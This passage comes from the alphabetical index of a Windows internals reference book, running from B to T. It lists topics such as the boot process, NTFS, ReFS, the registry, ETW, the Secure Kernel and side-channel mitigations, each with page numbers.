auto-expand pushlocks, 201
Autoruns tool, 837
autostart services startup, 451–457
AWE (Address Windowing Extension), 201
B
B+ Tree physical layout, ReFS (Resilient File System), 742–743
background tasks and Broker Infrastructure, 256–258
Background Broker Infrastructure, 244, 256–258
backing up encrypted files, 716–717
bad-cluster recovery, NTFS recovery support,
703–706. See also clusters
bad-cluster remapping, NTFS, 633
base named objects, looking at, 163–164.
See also objects
\BaseNamedObjects directory, 160
BCD (Boot Configuration Database), 392,
398–399
BCD library for boot operations, 790–792
BCD options
Windows hypervisor loader (Hvloader),
796–797
Windows OS Loader, 792–796
bcdedit command, 398–399
BI (Background Broker Infrastructure), 244,
256–258
BI (Broker Infrastructure), 238
BindFlt (Windows Bind minifilter driver), 248
BitLocker
encryption offload, 717–718
recovery procedure, 801
turning on, 804
block volumes, DAX (Direct Access Disks),
728–730
BNO (Base Named Object) Isolation, 167
BOOLEAN status, 208
boot application, launching, 800–801
Boot Manager
BCD objects, 798
overview, 785–799
and trusted execution, 805
boot menu, 799–800
boot process. See also Modern boot menu
BIOS, 781
driver loading in safe mode, 848–849
hibernation and Fast Startup, 840–844
hypervisor loader, 811–813
images start automatically, 837
kernel and executive subsystems, 818–824
kernel initialization phase 1, 824–829
Measured Boot, 801–805
ReadyBoot, 835–836
safe mode, 847–850
Secure Boot, 781–784
Secure Launch, 816–818
shutdown, 837–840
Smss, Csrss, Wininit, 830–835
trusted execution, 805–807
UEFI, 777–781
VSM (Virtual Secure Mode) startup policy,
813–816
Windows OS Loader, 808–810
WinRE (Windows Recovery
Environment), 845
boot status file, 850
Bootim.exe command, 832
booting from iSCSI, 811
BPB (boot parameter block), 657
BTB (Branch Target Buffer), 11
bugcheck, 40
C
C-states and timers, 76
cache
copying to and from, 584
forcing to write through to disk, 595
cache coherency, 568–569
cache data structures, 576–582
cache manager
in action, 591–594
centralized system cache, 567
disk I/O accounting, 600–601
features, 566–567
lazy writer, 622
mapping views of files, 573
memory manager, 567
memory partitions support, 571–572
NTFS MFT working set enhancements, 571
read-ahead thread, 622–623
recoverable file system support, 570
stream-based caching, 569
virtual block caching, 569
write-back cache with lazy write, 589
cache size, 574–576
cache virtual memory management, 572–573
cache-aware pushlocks, 200–201
caches and storage memory, 10
caching
with DMA (direct memory access) inter-
faces, 584–585
with mapping and pinning interfaces, 584
caching and file systems
disks, 565
partitions, 565
sectors, 565
volumes, 565–566
\Callback directory, 160
cd command, 144, 832
CDFS legacy format, 602
CEA (Common Event Aggregator), 238
Centennial applications, 246–249, 261
CFG (Control Flow Integrity), 343
Chain of Trust, 783–784
change journal file, NTFS on-disk structure,
675–679
change logging, NTFS, 637–638
check-disk and fast repair, NTFS recovery
support, 707–710
checkpoint records, NTFS recovery support, 698
!chksvctbl command, 103
CHPE (Compiled Hybrid Executable) bitmap, 115–118
CIM (Common Information Model), WMI
(Windows Management Instrumentation),
488–495
CLFS (common logging file system), 403–404
Clipboard User Service, 472
clock time, 57
cloning ReFS files, 755
Close method, 141
clusters. See also bad-cluster recovery
defined, 566
NTFS on-disk structure, 655–656
cmd command, 253, 261, 275, 289, 312, 526, 832
COM-hosted task, 479, 484–486
command line, activating apps through,
261–262
Command Prompt, 833, 845
commands
!acpiirqarb, 49
!alpc, 224
!apciirqarb, 48
!apic, 37
!arbiter, 48
bcdedit, 398–399
Bootim.exe, 832
cd, 144, 832
!chksvctbl, 103
cmd, 253, 261, 275, 289, 312, 526, 832
db, 102
defrag.exe, 646
!devhandles, 151
!devnode, 49
!devobj, 48
dg, 7–8
dps, 102–103
dt, 7–8
dtrace, 527
.dumpdebug, 547
dx, 7, 35, 46, 137, 150, 190
.enumtag, 547
eventvwr, 288, 449
!exqueue, 83
fsutil resource, 693
fsutil storagereserve findById, 687
g, 124, 241
Get-FileStorageTier, 649
Get-VMPmemController, 737
!handle, 149
!idt, 34, 38, 46
!ioapic, 38
!irql, 41
k, 485
link.exe/dump/loadconfig, 379
!locks, 198
msinfo32, 312, 344
notepad.exe, 405
!object, 137–138, 151, 223
perfmon, 505, 519
!pic, 37
!process, 190
!qlocks, 176
!reg openkeys, 417
regedit.exe, 468, 484, 542
Runas, 397
Set-PhysicalDisk, 774
taskschd.msc, 479, 484
!thread, 75, 190
.tss, 8
Wbemtest, 491
wnfdump, 237
committing a transaction, 697
Composition object, 129
compressing
nonsparse data, 673–674
sparse data, 671–672
compression and ghosting, ReFS (Resilient File
System), 769–770
compression and sparse files, NTFS, 637
condition variables, 205–206
connection ports, dumping, 223–224
container compaction, ReFS (Resilient File
System), 766–769
container isolation, support for, 626
contiguous file, 643
copying
to and from cache, 584
encrypted files, 717
CoreMessaging object, 130
corruption record, NTFS recovery support, 708
CoverageSampler object, 129
CPL (Code Privilege Level), 6
CPU branch predictor, 11–12
CPU cache(s), 9–10, 12–13
crash dump files, WER (Windows Error
Reporting), 543–548
crash dump generation, WER (Windows Error
Reporting), 548–551
crash report generation, WER (Windows Error
Reporting), 538–542
crashes, consequences of, 421
critical sections, 203–204
CS (Code Segment), 31
Csrss, 830–835, 838–840
D
data compression and sparse files, NTFS, 670–671
data redundancy and fault tolerance, 629–630
data streams, NTFS, 631–632
data structures, 184–189
DAX (Direct Access Disks). See also disks
block volumes, 728–730
cached and noncached I/O in volume,
723–724
driver model, 721–722
file system filter driver, 730–731
large and huge pages support, 732–735
mapping executable images, 724–728
overview, 720–721
virtual PMs and storage spaces support,
736–739
volumes, 722–724
DAX file alignment, 733–735
DAX mode I/Os, flushing, 731
db command, 102
/debug switch, FsTool, 734
debugger
breakpoints, 87–88
objects, 241–242
!pte extension, 735
!trueref command, 148
debugging. See also user-mode debugging
object handles, 158
trustlets, 374–375
WoW64 in ARM64 environments, 122–124
decryption process, 715–716
defrag.exe command, 646
defragmentation, NTFS, 643–645
Delete method, 141
Dependency Mini Repository, 255
Desktop object, 129
!devhandles command, 151
\Device directory, 161
device shims, 564
!devnode command, 49
!devobj command, 48
dg command, 4, 7–8
Directory object, 129
disk I/Os, counting, 601
disks, defined, 565. See also DAX (Direct
Access Disks)
dispatcher routine, 121
DLLs
Hvloader.dll, 811
IUM (Isolated User Mode), 371–372
Ntevt.dll, 497
for Wow64, 104–105
DMA (Direct Memory Access), 50, 584–585
DMTF, WMI (Windows Management
Instrumentation), 486, 489
DPC (dispatch or deferred procedure call) inter-
rupts, 54–61, 71. See also software interrupts
DPC Watchdog, 59
dps (dump pointer symbol) command, 102–103
drive-letter name resolution, 620
\Driver directory, 161
driver loading in safe mode, 848–849
driver objects, 451
driver shims, 560–563
\DriverStore(s) directory, 161
dt command, 7, 47
DTrace (dynamic tracing)
ETW provider, 533–534
FBT (Function Boundary Tracing) provider,
531–533
initialization, 529–530
internal architecture, 528–534
overview, 525–527
PID (Process) provider, 531–533
symbol server, 535
syscall provider, 530
type library, 534–535
dtrace command, 527
.dump command, LiveKd, 545
dump files, 546–548
Dump method, 141
.dumpdebug command, 547
Duplicate object service, 136
DVRT (Dynamic Value Relocation Table),
23–24, 26
dx command, 7, 35, 46, 137, 150, 190
Dxgk* objects, 129
dynamic memory, tracing, 532–533
dynamic partitioning, NTFS, 646–647
E
EFI (Extensible Firmware Interface), 777
EFS (Encrypting File System)
architecture, 712
BitLocker encryption offload, 717–718
decryption process, 715–716
described, 640
first-time usage, 713–715
information and key entries, 713
online support, 719–720
overview, 710–712
recovery agents, 714
EFS information, viewing, 716
EIP program counter, 8
enclave configuration, dumping, 379–381
encrypted files
backing up, 716–717
copying, 717
encrypting file data, 714–715
encryption NTFS, 640
encryption support, online, 719–720
EnergyTracker object, 130
enhanced timers, 78–81. See also timers
/enum command-line parameter, 786
.enumtag command, 547
Error Reporting. See WER (Windows Error
Reporting)
ETL file, decoding, 514–515
ETW (Event Tracing for Windows). See also trac-
ing dynamic memory
architecture, 500
consuming events, 512–515
events decoding, 513–515
Global logger and autologgers, 521
and high-frequency timers, 68–70
initialization, 501–502
listing processes activity, 510
logger thread, 511–512
overview, 499–500
providers, 506–509
providing events, 509–510
security, 522–525
security registry key, 503
sessions, 502–506
system loggers, 516–521
ETW provider, DTrace (dynamic tracing), 533–534
ETW providers, enumerating, 508
ETW sessions
default security descriptor, 523–524
enumerating, 504–506
ETW_GUID_ENTRY data structure, 507
ETW_REG_ENTRY, 507
EtwConsumer object, 129
EtwRegistration object, 129
Event Log provider DLL, 497
Event object, 128
Event Viewer tool, 288
eventvwr command, 288, 449
ExAllocatePool function, 26
exception dispatching, 85–91
executive mutexes, 196–197
executive objects, 126–130
executive resources, 197–199
exFAT, 606
explicit file I/O, 619–622
export thunk, 117
!exqueue command, 83
F
F5 key, 124, 397
fast I/O, 585–586. See also I/O system
fast mutexes, 196–197
fast repair and check-disk, NTFS recovery sup-
port, 707–710
Fast Startup and hibernation, 840–844
FAT12, FAT16, FAT32, 603–606
FAT64, 606
Fault Reporting process, WER (Windows Error
Reporting), 540
fault tolerance and data redundancy, NTFS,
629–630
FCB (File Control Block), 571
FCB Headers, 201
feature settings and values, 22–23
FEK (File Encryption Key), 711
file data, encrypting, 714–715
file names, NTFS on-disk structure, 664–666
file namespaces, 664
File object, 128
file record numbers, NTFS on-disk structure, 660
file records, NTFS on-disk structure, 661–663
file system drivers, 583
file system formats, 566
file system interfaces, 582–585
File System Virtualization, 248
file systems
CDFS, 602
data-scan sections, 624–625
drivers architecture, 608
exFAT, 606
explicit file I/O, 619–622
FAT12, FAT16, FAT32, 603–606
filter drivers, 626
filter drivers and minifilters, 623–626
filtering named pipes and mailslots, 625
FSDs (file system drivers), 608–617
mapped page writers, 622
memory manager, 622
NTFS file system, 606–607
operations, 618
Process Monitor, 627–628
ReFS (Resilient File System), 608
remote FSDs, 610–617
reparse point behavior, 626
UDF (Universal Disk Format), 603
\FileSystem directory, 161
fill buffers, 17
Filter Manager, 626
FilterCommunicationPort object, 130
FilterConnectionPort object, 130
Flags, 132
flushing mapped files, 595–596
Foreshadow (L1TF) attack, 16
fragmented file, 643
FSCTL (file system control) interface, 688
FSDs (file system drivers), 608–617
FsTool, /debug switch, 734
fsutil resource command, 693
fsutil storagereserve findById command, 687
G
g command, 124, 241
gadgets, 15
GDI/User objects, 126–127. See also
user-mode debugging
GDT (Global Descriptor Table), 2–5
Get-FileStorageTier command, 649
Get-VMPmemController command, 737
Gflags.exe, 554–557
GIT (Generic Interrupt Timer), 67
\GLOBAL?? directory, 161
global flags, 554–557
global namespace, 167
GPA (guest physical address), 17
GPIO (General Purpose Input Output), 51
GSIV (global system interrupt vector), 32, 51
guarded mutexes, 196–197
GUI thread, 96
H
HAM (Host Activity Manager), 244, 249–251
!handle command, 149
Handle count, 132
handle lists, single instancing, 165
handle tables, 146, 149–150
handles
creating maximum number of, 147
viewing, 144–145
hard links, NTFS, 634
hardware indirect branch controls, 21–23
hardware interrupt processing, 32–35
hardware side-channel vulnerabilities, 9–17
hibernation and Fast Startup, 840–844
high-IRQL synchronization, 172–177
hive handles, 410
hives. See also registry
loading, 421
loading and unloading, 408
reorganization, 414–415
HKEY_CLASSES_ROOT, 397–398
HKEY_CURRENT_CONFIG, 400
HKEY_CURRENT_USER subkeys, 395
HKEY_LOCAL_MACHINE, 398–400
HKEY_PERFORMANCE_DATA, 401
HKEY_PERFORMANCE_TEXT, 401
HKEY_USERS, 396
HKLM\SYSTEM\CurrentControlSet\Control\
SafeBoot registry key, 848
HPET (High Performance Event Timer), 67
hung program screen, 838
HungAppTimeout, 839
HVCI (Hypervisor Enforced Code Integrity), 358
hybrid code address range table, dumping,
117–118
hybrid shutdown, 843–844
hypercalls and hypervisor TLFS (Top Level
Functional Specification), 299–300
Hyper-V schedulers. See also Windows
hypervisor
classic, 289–290
core, 291–294
overview, 287–289
root scheduler, 294–298
SMT system, 292
hypervisor debugger, connecting, 275–277
hypervisor loader boot module, 811–813
I
IBPB (Indirect Branch Predictor Barrier), 22, 25
IBRS (Indirect Branch Restricted Speculation),
21–22, 25
IDT (interrupt dispatch table), 32–35
!idt command, 34, 38, 46
images starting automatically, 837
Import Optimization and Retpoline, 23–26
indexing facility, NTFS, 633, 679–680
Info mask, 132
Inheritance object service, 136
integrated scheduler, 294
interlocked operations, 172
interrupt control flow, 45
interrupt dispatching
hardware interrupt processing, 32–35
overview, 32
programmable interrupt controller
architecture, 35–38
software IRQLs (interrupt request levels),
38–50
interrupt gate, 32
interrupt internals, examining, 46–50
interrupt objects, 43–50
interrupt steering, 52
interrupt vectors, 42
interrupts
affinity and priority, 52–53
latency, 50
masking, 39
I/O system, components of, 652. See also
Fast I/O
IOAPIC (I/O Advanced Programmable Interrupt
Controller), 32, 36
!ioapic command, 38
IoCompletion object, 128
IoCompletionReserve object, 128
Ionescu, Alex, 28
IRPs (I/O request packets), 567, 583, 585, 619,
621–624, 627, 718
IRQ affinity policies, 53
IRQ priorities, 53
IRQL (interrupt request levels), 347–348.
See also software IRQLs (interrupt request
levels)
!irql command, 41
IRTimer object, 128
iSCSI, booting from, 811
isolation, NTFS on-disk structure, 689–690
ISR (interrupt service routine), 31
IST (Interrupt Stack Table), 7–9
IUM (Isolated User Mode)
overview, 371–372
SDF (Secure Driver Framework), 376
secure companions, 376
secure devices, 376–378
SGRA (System Guard Runtime attestation),
386–390
trustlets creation, 372–375
VBS-based enclaves, 378–386
J
jitted blocks, 115, 117
jitting and execution, 121–122
Job object, 128
K
k command, 485
Kali Linux, 247
KeBugCheckEx system function, 32
KEK (Key Exchange Key), 783
kernel. See also Secure Kernel
dispatcher objects, 179–181
objects, 126
spinlocks, 174
synchronization mechanisms, 179
kernel addresses, mapping, 20
kernel debugger
!handle extension, 125
!locks command, 198
searching for open files with, 151–152
viewing handle table with, 149–150
kernel logger, tracing TCP/IP activity with,
519–520
Kernel Patch Protection, 24
kernel reports, WER (Windows Error
Reporting), 551
kernel shims
database, 559–560
device shims, 564
driver shims, 560–563
engine initialization, 557–559
shim database, 559–560
witnessing, 561–563
kernel-based system call dispatching, 97
kernel-mode debugging events, 240
\KernelObjects directory, 161
Key object, 129
keyed events, 194–196
KeyedEvent object, 128
KiIsrThunk, 33
KINTERRUPT object, 44, 46
\KnownDlls directory, 161
\KnownDlls32 directory, 161
KPCR (Kernel Processor Control Region), 4
KPRCB fields, timer processing, 72
KPTI (Kernel Page Table Isolation), 18
KTM (Kernel Transaction Manager), 157, 688
KVA Shadow, 18–21
L
L1TF (Foreshadow) attack, 16
LAPIC (Local Advanced Programmable
Interrupt Controllers), 32
lazy jitter, 119
lazy segment loading, 6
lazy writing
disabling, 595
and write-back caching, 589–595
LBA (logical block address), 589
LCNs (logical cluster numbers), 656–658
leak detections, ReFS (Resilient File System),
761–762
leases, 614–615, 617
LFENCE, 23
LFS (log file service), 652, 695–697
line-based versus message signaled-based
interrupts, 50–66
link tracking, NTFS, 639
link.exe tool, 117, 379
link.exe/dump/loadconfig command, 379
LiveKd, .dump command, 545
load ports, 17
loader issues, troubleshooting, 556–557
Loader Parameter block, 819–821
local namespace, 167
local procedure call
ALPC direct event attribute, 222
ALPC port ownership, 220
asynchronous operation, 214–215
attributes, 216–217
blobs, handles, and resources, 217–218
local procedure call (continued)
connection model, 210–212
debugging and tracing, 222–224
handle passing, 218–219
message model, 212–214
overview, 209–210
performance, 220–221
power management, 221
security, 219–220
views, regions, and sections, 215–216
Lock, 132
!locks command, kernel debugger, 198
log record types, NTFS recovery support,
697–699
$LOGGED_UTILITY_STREAM attribute, 663
logging implementation, NTFS on-disk struc-
ture, 693
Low-IRQL synchronization. See also
synchronization
address-based waits, 202–203
condition variables, 205–206
critical sections, 203–204
data structures, 184–194
executive resources, 197–202
kernel dispatcher objects, 179–181
keyed events, 194–196
mutexes, 196–197
object-less waiting (thread alerts), 183–184
overview, 177–179
run once initialization, 207–208
signalling objects, 181–183
SRW (Slim Reader/Writer) locks, 206–207
user-mode resources, 205
LRC parity and RAID 6, 773
LSASS (Local Security Authority Subsystem
Service) process, 453, 465
LSN (logical sequence number), 570
M
mailslots and named pipes, filtering, 625
Make permanent/temporary object service, 136
mapped files, flushing, 595–596
mapping and pinning interfaces, caching
with, 584
masking interrupts, 39
MBEC (Mode Base Execution Controls), 93
MDL (Memory Descriptor List), 220
MDS (Microarchitectural Data Sampling), 17
Measured Boot, 801–805
media mixer, creating, 165
Meltdown attack, 14, 18
memory, sharing, 171
memory hierarchy, 10
memory manager
modified and mapped page writer, 622
overview, 567
page fault handler, 622–623
memory partitions support, 571–572
metadata
defined, 566, 570
metadata logging, NTFS recovery support, 695
MFT (Master File Table)
NTFS metadata files in, 657
NTFS on-disk structure, 656–660
record for small file, 661
MFT file records, 668–669
MFT records, compressed file, 674
Microsoft Incremental linker (link.exe), 117
minifilter driver, Process Monitor, 627–628
Minstore architecture, ReFS (Resilient File
System), 740–742
Minstore I/O, ReFS (Resilient File System),
746–748
Minstore write-ahead logging, 758
Modern Application Model, 249, 251, 262
modern boot menu, 832–833. See also boot
process
MOF (Managed Object Format), WMI
(Windows Management Instrumentation),
488–495
MPS (Multiprocessor Specification), 35
Msconfig utility, 837
MSI (message signaled interrupts), 50–66
msinfo32 command, 312, 344
MSRs (model specific registers), 92
Mutex object, 128
mutexes, fast and guarded, 196–197
mutual exclusion, 170
N
named pipes and mailslots, filtering, 625
namespace instancing, viewing, 169
\NLS directory, 161
nonarchitectural system service dispatching,
96–97
nonsparse data, compressing, 673–674
notepad.exe command, 405
notifications. See WNF (Windows Notification
Facility)
NT kernel, 18–19, 22
Ntdll version list, 106
Ntevt.dll, 497
NTFS bad-cluster recovery, 703–706
NTFS file system
advanced features, 630
change logging, 637–638
compression and sparse files, 637
data redundancy, 629–630
data streams, 631–632
data structures, 654
defragmentation, 643–646
driver, 652–654
dynamic bad-cluster remapping, 633
dynamic partitioning, 646–647
encryption, 640
fault tolerance, 629–630
hard links, 634
high-end requirements, 628
indexing facility, 633
link tracking, 639
metadata files in MFT, 657
overview, 606–607
per-user volume quotas, 638–639
POSIX deletion, 641–643
recoverability, 629
recoverable file system support, 570
and related components, 653
security, 629
support for tiered volumes, 647–651
symbolic links and junctions, 634–636
Unicode-based names, 633
NTFS files, attributes for, 662–663
NTFS information, viewing, 660
NTFS MFT working set enhancements, 571
NTFS on-disk structure
attributes, 667–670
change journal file, 675–679
clusters, 655–656
consolidated security, 682–683
data compression and sparse files, 670–674
on-disk implementation, 691–693
file names, 664–666
file record numbers, 660
file records, 661–663
indexing, 679–680
isolation, 689–690
logging implementation, 693
master file table, 656–660
object IDs, 681
overview, 654
quota tracking, 681–682
reparse points, 684–685
sparse files, 675
Storage Reserves and reservations, 685–688
transaction support, 688–689
transactional APIs, 690
tunneling, 666–667
volumes, 655
NTFS recovery support
analysis pass, 700
bad clusters, 703–706
check-disk and fast repair, 707–710
design, 694–695
LFS (log file service), 695–697
NTFS recovery support (continued)
log record types, 697–699
metadata logging, 695
recovery, 699–700
redo pass, 701
self-healing, 706–707
undo pass, 701–703
NTFS reservations and Storage Reserves,
685–688
Ntoskrnl and Winload, 818
NVMe (Non-volatile Memory disk), 565
O
!object command, 137–138, 151, 223
Object Create Info, 132
object handles, 146, 158
object IDs, NTFS on-disk structure, 681
Object Manager
executive objects, 127–130
overview, 125–127
resource accounting, 159
symbolic links, 166–170
Object type index, 132
object-less waiting (thread alerts), 183–184
objects. See also base named objects; private
objects; reserve objects
directories, 160–165
filtering, 170
flags, 134–135
handles and process handle table, 143–152
headers and bodies, 131–136
methods, 140–143
names, 159–160
reserves, 152–153
retention, 155–158
security, 153–155
services, 136
signalling, 181–183
structure, 131
temporary and permanent, 155
types, 126, 136–140
\ObjectTypes directory, 161
ODBC (Open Database Connectivity),
WMI (Windows Management
Instrumentation), 488
Okay to close method, 141
on-disk implementation, NTFS on-disk
structure, 691–693
open files, searching for, 151–152
open handles, viewing, 144–145
Open method, 141
Openfiles/query command, 126
oplocks and FSDs, 611–612, 616
Optimize Drives tool, 644–645
OS/2 operating system, 130
out-of-order execution, 10–11
P
packaged applications. See also apps
activation, 259–264
BI (Background Broker Infrastructure),
256–258
bundles, 265
Centennial, 246–249
Dependency Mini Repository, 255
Host Activity Manager, 249–251
overview, 243–245
registration, 265–266
scheme of lifecycle, 250
setup and startup, 258
State Repository, 251–254
UWP, 245–246
page table, ReFS (Resilient File System),
745–746
PAN (Privileged Access Never), 57
Parse method, 141
Partition object, 130
partitions
caching and file systems, 565
defined, 565
PC Reset, 845
PCIDs (Process-Context Identifiers), 20
PEB (process environment block), 104
per-file cache data structures, 579–582
perfmon command, 505, 519
per-user volume quotas, NTFS, 638–639
PFN database, physical memory removed
from, 286
PIC (Programmable Interrupt Controller), 35–38
!pic command, 37
pinning and mapping interfaces, caching
with, 584
pinning the bucket, ReFS (Resilient File
System), 743
PIT (Programmable Interrupt Timer), 66–67
PM (persistent memory), 736
Pointer count field, 132
pop thunk, 117
POSIX deletion, NTFS, 641–643
PowerRequest object, 129
private objects, looking at, 163–164.
See also objects
Proactive Scan maintenance task, 708–709
!process command, 190
Process Explorer, 58, 89–91, 144–145, 147,
153–154, 165, 169
Process Monitor, 591–594, 627–628, 725–728
Process object, 128, 137
processor execution model, 2–9
processor selection, 73–75
processor traps, 33
Profile object, 130
PSM (Process State Manager), 244
!pte extension of debugger, 735
PTEs (Page table entries), 16, 20
push thunk, 117
pushlocks, 200–202
Q
!qlocks command, 176
Query name method, 141
Query object service, 136
Query security object service, 136
queued spinlocks, 175–176
quota tracking, NTFS on-disk structure,
681–682
R
RAID 6 and LRC parity, 773
RAM (Random Access Memory), 9–11
RawInputManager object, 130
RDCL (Rogue Data Cache load), 14
Read (R) access, 615
read-ahead and write-behind
cache manager disk I/O accounting,
600–601
disabling lazy writing, 595
dynamic memory, 599–600
enhancements, 588–589
flushing mapped files, 595–596
forcing cache to write through disk, 595
intelligent read-ahead, 587–588
low-priority lazy writes, 598–599
overview, 586–587
system threads, 597–598
write throttling, 596–597
write-back caching and lazy writing,
589–594
reader/writer spinlocks, 176–177
ReadyBoost driver service settings, 810
ReadyBoot, 835–836
Reconciler, 419–420
recoverability, NTFS, 629
recoverable file system support, 570
recovery, NTFS recovery support, 699–700.
See also WinRE (Windows Recovery
Environment)
redo pass, NTFS recovery support, 701
ReFS (Resilient File System)
allocators, 743–745
architecture’s scheme, 749
B+ tree physical layout, 742–743
compression and ghosting, 769–770
container compaction, 766–769
ReFS (Resilient File System) (continued)
data integrity scanner, 760
on-disk structure, 751–752
file integrity streams, 760
files and directories, 750
file’s block cloning and spare VDL, 754–757
leak detections, 761–762
Minstore architecture, 740–742
Minstore I/O, 746–748
object IDs, 752–753
overview, 608, 739–740, 748–751
page table, 745–746
pinning the bucket, 743
recovery support, 759–761
security and change journal, 753–754
SMR (shingled magnetic recording) vol-
umes, 762–766
snapshot support through HyperV, 756–757
tiered volumes, 764–766
write-through, 757–758
zap and salvage operations, 760
ReFS files, cloning, 755
!reg openkeys command, 417
regedit.exe command, 468, 484, 542
registered file systems, 613–614
registry. See also hives
application hives, 402–403
cell data types, 411–412
cell maps, 413–414
CLFS (common logging file system), 403–404
data types, 393–394
differencing hives, 424–425
filtering, 422
hive structure, 411–413
hives, 406–408
HKEY_CLASSES_ROOT, 397–398
HKEY_CURRENT_CONFIG, 400
HKEY_CURRENT_USER subkeys, 395
HKEY_LOCAL_MACHINE, 398–400
HKEY_PERFORMANCE_DATA, 401
HKEY_PERFORMANCE_TEXT, 401
HKEY_USERS, 396
HKLM\SYSTEM\CurrentControlSet\Control\
SafeBoot key, 848
incremental logging, 419–421
key control blocks, 417–418
logical structure, 394–401
modifying, 392–393
monitoring activity, 404
namespace and operation, 415–418
namespace redirection, 423
optimizations, 425–426
Process Monitor, 405–406
profile loading and unloading, 397
Reconciler, 419–420
remote BCD editing, 398–399
reorganization, 414–415
root keys, 394–395
ServiceGroupOrder key, 452
stable storage, 418–421
startup and process, 408–414
symbolic links, 410
TxR (Transactional Registry), 403–404
usage, 392–393
User Profiles, 396
viewing and changing, 391–392
virtualization, 422–425
RegistryTransaction object, 129
reparse points, 626, 684–685
reserve objects, 152–153. See also objects
resident and nonresident attributes, 667–670
resource manager information, querying,
692–693
Resource Monitor, 145
Restricted User Mode, 93
Retpoline and Import optimization, 23–26
RH (Read-Handle) access, 615
RISC (Reduced Instruction Set Computing), 113
root directory (\), 692
\RPC Control directory, 161
RSA (Rivest-Shamir-Adleman) public key
algorithm, 711
RTC (Real Time Clock), 66–67
run once initialization, 207–208
Runas command, 397
runtime drivers, 24
RW (Read-Write) access, 615
RWH (Read-Write-Handle) access, 615
S
safe mode, 847–850
SCM (Service Control Manager)
network drive letters, 450
overview, 446–449
and Windows services, 426–428
SCM Storage driver model, 722
SCP (service control program), 426–427
SDB (shim database), 559–560
SDF (Secure Driver Framework), 376
searching for open files, 151–152
SEB (System Events Broker), 226, 238
second-chance notification, 88
Section object, 128
sectors
caching and file systems, 565
and clusters on disk, 566
defined, 565
secure boot, 781–784
Secure Kernel. See also kernel
APs (application processors) startup,
362–363
control over hypercalls, 349
hot patching, 368–371
HVCI (Hypervisor Enforced Code
Integrity), 358
memory allocation, 367–368
memory manager, 363–368
NAR data structure, 365
overview, 345
page identity/secure PFN database,
366–367
secure intercepts, 348–349
secure IRQLs, 347–348
secure threads and scheduling, 356–358
Syscall selector number, 354
trustlet for normal call, 354
UEFI runtime virtualization, 358–360
virtual interrupts, 345–348
VSM startup, 360–363
VSM system calls, 349–355
Secure Launch, 816–818
security consolidation, NTFS on-disk structure,
682–683
Security descriptor field, 132
\Security directory, 161
Security method, 141
security reference monitor, 153
segmentation, 2–6
self-healing, NTFS recovery support, 706–707
Semaphore object, 128
service control programs, 450–451
service database, organization of, 447
service descriptor tables, 100–104
ServiceGroupOrder registry key, 452
services logging, enabling, 448–449
session namespace, 167–169
Session object, 130
\Sessions directory, 161
Set security object service, 136
/setbootorder command-line parameter, 788
Set-PhysicalDisk command, 774
SGRA (System Guard Runtime attestation),
386–390
SGX, 16
shadow page tables, 18–20
shim database, 559–560
shutdown process, 837–840
SID (security identifier), 162
side-channel attacks
L1TF (Foreshadow), 16
MDS (Microarchitectural Data Sampling), 17
Meltdown, 14
Spectre, 14–16
SSB (speculative store bypass), 16
Side-channel mitigations in Windows
hardware indirect branch controls, 21–23
KVA Shadow, 18–21
Retpoline and import optimization, 23–26
STIBP pairing, 26–30
Signal an object and wait for another service, 136
Sihost process, 834
\Silo directory, 161
SKINIT and Secure Launch, 816, 818
SkTool, 28–29
SLAT (Second Level Address Translation) table, 17
SMAP (Supervisor Mode Access Protection),
57, 93
SMB protocol, 614–615
SMP (symmetric multiprocessing), 171
SMR (shingled magnetic recording) volumes,
762–763
SMR disks tiers, 765–766
Smss user-mode process, 830–835
SMT system, 292
software interrupts. See also DPC (dispatch or
deferred procedure call) interrupts
APCs (asynchronous procedure calls), 61–66
DPC (dispatch or deferred procedure call),
54–61
overview, 54
software IRQLs (interrupt request levels), 38–
50. See also IRQL (interrupt request levels)
Spaces. See Storage Spaces
sparse data, compressing, 671–672
sparse files
and data compression, 670–671
NTFS on-disk structure, 675
Spectre attack, 14–16
SpecuCheck tool, 28–29
SpeculationControl PowerShell script, 28
spinlocks, 172–177
Spot Verifier service, NTFS recovery support, 708
spurious traps, 31
SQLite databases, 252
SRW (Slim Read Writer) Locks, 178, 195, 205–207
SSB (speculative store bypass), 16
SSBD (Speculative Store Bypass Disable), 22
SSD (solid-state disk), 565, 644–645
SSD volume, retrimming, 646
Startup Recovery tool, 846
Startup Repair, 845
State Repository, 251–252
state repository, witnessing, 253–254
STIBP (Single Thread Indirect Branch
Predictors), 22, 25–30
Storage Reserves and NTFS reservations,
685–688
Storage Spaces
internal architecture, 771–772
overview, 770–771
services, 772–775
store buffers, 17
stream-based caching, 569
structured exception handling, 85
Svchost service splitting, 467–468
symbolic links, 166
symbolic links and junctions, NTFS, 634–637
SymbolicLink object, 129
symmetric encryption, 711
synchronization. See also Low-IRQL
synchronization
High-IRQL, 172–177
keyed events, 194–196
overview, 170–171
syscall instruction, 92
system call numbers, mapping to functions and
arguments, 102–103
system call security, 99–100
system call table compaction, 101–102
system calls and exception dispatching, 122
system crashes, consequences of, 421
System Image Recover, 845
SYSTEM process, 19–20
System Restore, 845
system service activity, viewing, 104
system service dispatch table, 96
system service dispatcher, locating, 94–95
system service dispatching, 98
system service handling
architectural system service dispatching,
92–95
overview, 91
system side-channel mitigation status,
querying, 28–30
system threads, 597–598
system timers, listing, 74–75. See also timers
system worker threads, 81–85
T
task state segments, 6–9
Task Manager, starting, 832
Task Scheduler
boot task master key, 478
COM interfaces, 486
initialization, 477–481
overview, 476–477
Triggers and Actions, 478
and UBPM (Unified Background Process
Manager), 481–486
XML descriptor, 479–481
task scheduling and UBPM, 475–476
taskschd.msc command, 479, 484
TBOOT module, 806
TCP/IP activity, tracing with kernel logger,
519–520
TEB (Thread Environment Block), 4–5, 104
Terminal object, 130
TerminalEventQueue object, 130
thread alerts (object-less waiting), 183–184
!thread command, 75, 190
thread-local register effect, 4. See also
Windows threads
thunk kernel routines, 33
tiered volumes. See also volumes
creating maximum number of, 774–775
support for, 647–651
Time Broker, 256
timer coalescing, 76–77
timer expiration, 70–72
timer granularity, 67–70
timer lists, 71
Timer object, 128
timer processing, 66
timer queuing behaviors, 73
timer serialization, 73
timer tick distribution, 75–76
timer types
and intervals, 66–67
and node collection indices, 79
timers. See also enhanced timers; system timers
high frequency, 68–70
high resolution, 80
TLB flushing algorithm, 18, 20–21, 272
TmEn object, 129
TmRm object, 129
TmTm object, 129
TmTx object, 129
Token object, 128
TPM (Trusted Platform Module), 785, 800–801
TPM measurements, invalidating, 803–805
TpWorkerFactory object, 129
TR (Task Register), 6, 32
Trace Flags field, 132
tracing dynamic memory, 532–533. See also
